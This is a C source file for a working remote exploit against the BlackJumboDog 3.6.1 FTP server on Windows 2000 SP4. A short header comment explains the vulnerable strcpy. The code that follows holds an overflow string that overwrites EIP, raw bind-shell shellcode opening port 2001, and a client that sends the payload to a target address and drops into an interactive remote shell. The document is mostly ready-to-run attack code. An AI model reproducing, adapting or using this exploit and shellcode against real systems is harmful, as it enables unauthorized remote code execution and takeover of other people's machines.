//**************************************************************************
// BlackJumboDog FTP Server Buffer Overflow Vulnerability
// Bind Shell Exploit for English Win2K SP4
// 27 Jul 2004
//
// BlackJumboDog is an integrated proxy server, web server and FTP server
// developed by SapporoWorks for Microsoft Windows platforms. BlackJumboDog
// version 3.6.1 is vulnerable to a buffer overflow in its FTP server. By
// sending a FTP request containing an overly long parameter string in the
// USER, PASS, RETR, CWD, XMKD, XRMD or various other commands, a remote
// attacker can cause a stack overflow, overwriting EIP, and could execute
// arbitrary code.
//
// This vulnerability is caused by an unsafe strcpy that copies the entire
// parameter of the user's FTP command to a stack buffer of 256 bytes.
// For example, if the user's FTP client issues the following command,
//
// USER xxxxxxxxxxxx
//
// The FTP command parameter "xxxxxxxxxxxx" will be copied to a 256 bytes
// buffer using strcpy. Hence, by crafting an FTP command with an overly long
// parameter, a remote attacker can trigger a stack overflow and execute
// arbitrary code. The attacker do not need to have a valid account on the
// FTP server since the overflow can be triggered before authentication using
// the USER command.
//
// This exploit code binds shell on port 2001 of a vulnerable BlackJumboDog
// FTP server.
//
// Advisory
// http://www.security.org.sg/vuln/bjd361.html
//
// Greetz: snooq, sk, and all guys at SIG^2 (www.security.org.sg);
//
//**************************************************************************#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32.lib")
unsigned char expBuf[] =
"USER "
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV"
"WWWW"
"AAAABBBB"
"\xEB\x06\x90\x90" // call ebx lands here
"\xD6\x19\x02\x75" // this overwrites EIP (address of CALL EBX)
"\x90\x90\x90\x90"
"\xEB\x62\x55\x8B\xEC\x51\x56\x57\x8B\x5D\x08\x8B\x73\x3C\x8B\x74"
"\x33\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x18\x56\x33\xD2\x8B"
"\x37\x03\x75\x08\x33\xDB\x33\xC0\xAC\x85\xC0\x74\x09\xC1\xCB\x0C"
"\xD1\xCB\x03\xD8\xEB\xF0\x3B\x5D\x0C\x74\x0B\x83\xC7\x04\x42\xE2"
"\xDE\x5E\x33\xC0\xEB\x17\x5E\x8B\x7E\x24\x03\x7D\x08\x66\x8B\x04"
"\x57\x8B\x7E\x1C\x03\x7D\x08\x8B\x04\x87\x03\x45\x08\x5F\x5E\x59"
"\x8B\xE5\x5D\xC3\x55\x8B\xEC\x33\xC9\xB1\xC8\x2B\xE1\x32\xC0\x8B"
"\xFC\xF3\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B"
"\x58\x08\x89\x5D\xFC\x68\x8E\x4E\x0E\xEC\xFF\x75\xFC\xE8\x70\xFF"
"\xFF\xFF\x83\xC4\x08\xBB\xAA\xAA\x6C\x6C\xC1\xEB\x10\x53\x68\x33"
"\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD0\x89\x45\xF8\xEB\x35"
"\x5E\x8D\x7D\xF4\x33\xC9\xB1\x09\xFF\x36\xFF\x75\xFC\xE8\x40\xFF"
"\xFF\xFF\x83\xC4\x08\x85\xC0\x75\x0E\x90\xFF\x36\xFF\x75\xF8\xE8"
"\x2E\xFF\xFF\xFF\x83\xC4\x08\x89\x07\x33\xC0\xB0\x04\x03\xF0\x2B"
"\xF8\xE2\xD5\xEB\x29\xE8\xC6\xFF\xFF\xFF\x72\xFE\xB3\x16\x35\x54"
"\x8A\xA1\xA4\xAD\x2E\xE9\xA4\x1A\x70\xC7\xD9\x09\xF5\xAD\xCB\xED"
"\xFC\x3B\xEF\xCE\xE0\x60\xE7\x79\xC6\x79\xAD\xD9\x05\xCE\x54\x6A"
"\x02\xFF\x55\xE0\x33\xC0\x50\x50\x50\x50\x6A\x01\x6A\x02\xFF\x55"
"\xE4\x89\x45\xD0\x33\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50"
"\x8B\xC4\x6A\x10\x50\xFF\x75\xD0\xFF\x55\xE8\x6A\x05\xFF\x75\xD0"
"\xFF\x55\xEC\x85\xC0\x75\x68\x8B\xCC\x6A\x10\x8B\xDC\x33\xC0\x50"
"\x50\x53\x51\xFF\x75\xD0\xFF\x55\xF0\x8B\xD0\x5B\x83\xF0\xFF\x74"
"\x4E\x8B\xFC\x33\xC9\xB1\x64\x33\xC0\xF3\xAA\xC6\x04\x24\x44\x66"
"\xC7\x44\x24\x2C\x01\x01\x89\x54\x24\x38\x89\x54\x24\x3C\x89\x54"
"\x24\x40\x8B\xC4\x8D\x58\x44\xB9\xFF\x63\x6D\x64\xC1\xE9\x08\x51"
"\x8B\xCC\x52\x53\x53\x50\x33\xC0\x50\x50\x50\x6A\x01\x50\x50\x51"
"\x50\xFF\x55\xF4\x5B\x6A\xFF\xFF\x33\xFF\x55\xD4\xFF\x55\xD8\xFF"
"\x75\xD0\xFF\x55\xD8\x50\xFF\x55\xDC"
"\r\n";
void shell(int sockfd)
{
char buffer[1024];
fd_set rset;
FD_ZERO(&rset);
for(;;)
{
if(kbhit() != 0)
{
fgets(buffer, sizeof(buffer) - 2, stdin);
send(sockfd, buffer, strlen(buffer), 0);
}
FD_ZERO(&rset);
FD_SET(sockfd, &rset);
timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 50;
if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
{
printf("select error\n");
break;
}
if(FD_ISSET(sockfd, &rset))
{
int n;
ZeroMemory(buffer, sizeof(buffer));
if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
{
printf("EOF\n");
exit(0);
}
else
{
fwrite(buffer, 1, n, stdout);
}
}
}
}
int main(int argc, char* argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sin;
int err;
char inBuffer[10000];
if(argc != 2)
{
printf("Usage: %s <ip addr>\n", argv[0]);
return 1;
}
wVersionRequested = MAKEWORD(2,0);
err = WSAStartup(wVersionRequested, &wsaData);
if(err != 0)
{
printf("\nWSAStartup Error.\n");
return 1;
}
if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
{
printf("\nWinsock Version Error\n");
WSACleanup();
return 1;
}
SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family = AF_INET;
sin.sin_port = htons(21);
if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
{
int size;
// read FTP banner
size = recv(s, inBuffer, sizeof(inBuffer), 0);
if(size == SOCKET_ERROR)
{
printf("Error receiving FTP banner!\n");
return 1;
}
fwrite(inBuffer, 1, size, stdout);
if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)
{
printf("Error sending exploit!\n");
return 1;
}
printf("Exploit Sent.\n");
Sleep(2000);
//================================= Connect to the target ==============================
SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == INVALID_SOCKET)
{
printf("Invalid socket return in socket() call.\n");
WSACleanup();
return -1;
}
sin.sin_family = AF_INET;
sin.sin_port = htons(2001);
sin.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
{
printf("Exploit Failed. SOCKET_ERROR return in connect call.\n");
closesocket(sock);
WSACleanup();
return -1;
}
shell(sock);
}
else
{
printf("Cannot connect!\n");
}
closesocket(s);
WSACleanup();
return 0;
}